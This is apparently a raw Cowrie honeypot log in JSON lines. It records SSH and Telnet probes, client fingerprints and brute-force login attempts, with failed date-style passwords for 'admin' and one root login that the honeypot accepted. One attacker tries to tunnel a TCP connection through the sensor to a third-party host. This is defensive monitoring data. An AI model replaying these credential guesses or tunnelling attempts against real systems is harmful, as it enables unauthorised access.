{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T23:56:19.019926Z","src_ip":"212.227.235.229","session":"da57445426c3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:56:19.418322Z","src_ip":"212.227.235.229","session":"da57445426c3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T23:56:19.551080Z","session":"da57445426c3"}
{"eventid":"cowrie.session.closed","duration":8.688415050506592,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:56:20.961104Z","src_ip":"212.227.125.160","session":"bdc2da71c3a3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65036,"dst_ip":"1.2.3.4","dst_port":22,"session":"d05544cbd9df","protocol":"ssh","message":"New connection: 217.72.205.35:65036 (1.2.3.4:22) [session: d05544cbd9df]","sensor":"my-vps","timestamp":"2025-08-28T23:57:09.734205Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:57:09.735445Z","src_ip":"217.72.205.35","session":"d05544cbd9df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51162,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d35b528739","protocol":"ssh","message":"New connection: 212.227.235.229:51162 (1.2.3.4:22) [session: 62d35b528739]","sensor":"my-vps","timestamp":"2025-08-28T23:57:19.072800Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:57:19.173321Z","src_ip":"212.227.235.229","session":"62d35b528739"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:57:28.886702Z","src_ip":"212.227.235.229","session":"da57445426c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54285,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b20f25db81","protocol":"ssh","message":"New connection: 212.227.235.229:54285 (1.2.3.4:22) [session: 13b20f25db81]","sensor":"my-vps","timestamp":"2025-08-28T23:57:29.689419Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:57:30.013618Z","src_ip":"212.227.235.229","session":"13b20f25db81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60344,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cae30151d53","protocol":"ssh","message":"New connection: 212.227.125.160:60344 (1.2.3.4:22) [session: 5cae30151d53]","sensor":"my-vps","timestamp":"2025-08-28T23:57:57.940222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:57:57.941483Z","src_ip":"212.227.125.160","session":"5cae30151d53"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:57:57.992306Z","src_ip":"212.227.125.160","session":"5cae30151d53"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T23:57:58.152132Z","src_ip":"212.227.125.160","session":"5cae30151d53"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:57:59.339187Z","src_ip":"212.227.125.160","session":"5cae30151d53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40390,"dst_ip":"1.2.3.4","dst_port":22,"session":"13345fbee6d5","protocol":"ssh","message":"New connection: 212.227.125.160:40390 (1.2.3.4:22) [session: 13345fbee6d5]","sensor":"my-vps","timestamp":"2025-08-28T23:58:22.336483Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-28T23:58:22.337427Z","src_ip":"212.227.125.160","session":"13345fbee6d5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:58:22.338169Z","src_ip":"212.227.125.160","session":"13345fbee6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40430,"dst_ip":"1.2.3.4","dst_port":22,"session":"5798f0b00474","protocol":"ssh","message":"New connection: 212.227.125.160:40430 (1.2.3.4:22) [session: 5798f0b00474]","sensor":"my-vps","timestamp":"2025-08-28T23:58:25.671292Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T23:58:25.700817Z","src_ip":"212.227.125.160","session":"5798f0b00474"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:58:25.702715Z","src_ip":"212.227.125.160","session":"5798f0b00474"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":25909,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc420baed224","protocol":"ssh","message":"New connection: 80.94.95.112:25909 (1.2.3.4:22) [session: cc420baed224]","sensor":"my-vps","timestamp":"2025-08-28T23:58:44.351040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:58:44.352070Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:58:44.382097Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25021993","message":"login attempt [admin/25021993] failed","sensor":"my-vps","timestamp":"2025-08-28T23:58:44.587116Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25021982","message":"login attempt [admin/25021982] failed","sensor":"my-vps","timestamp":"2025-08-28T23:58:45.620058Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25011992","message":"login attempt [admin/25011992] failed","sensor":"my-vps","timestamp":"2025-08-28T23:58:46.653273Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.login.failed","username":"admin","password":"24121983","message":"login attempt [admin/24121983] failed","sensor":"my-vps","timestamp":"2025-08-28T23:58:47.685837Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.login.failed","username":"admin","password":"24111980","message":"login attempt [admin/24111980] failed","sensor":"my-vps","timestamp":"2025-08-28T23:58:48.718949Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:58:49.751696Z","src_ip":"80.94.95.112","session":"cc420baed224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45578,"dst_ip":"1.2.3.4","dst_port":23,"session":"960a8c373961","protocol":"telnet","message":"New connection: 212.227.235.229:45578 (1.2.3.4:23) [session: 960a8c373961]","sensor":"my-vps","timestamp":"2025-08-28T23:59:02.093195Z"}
{"eventid":"cowrie.session.closed","duration":12.36126184463501,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:59:14.454352Z","src_ip":"212.227.235.229","session":"960a8c373961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35750,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c3bf0826ce7","protocol":"ssh","message":"New connection: 212.227.125.160:35750 (1.2.3.4:22) [session: 7c3bf0826ce7]","sensor":"my-vps","timestamp":"2025-08-28T23:59:25.458933Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:59:25.519993Z","src_ip":"212.227.125.160","session":"7c3bf0826ce7"}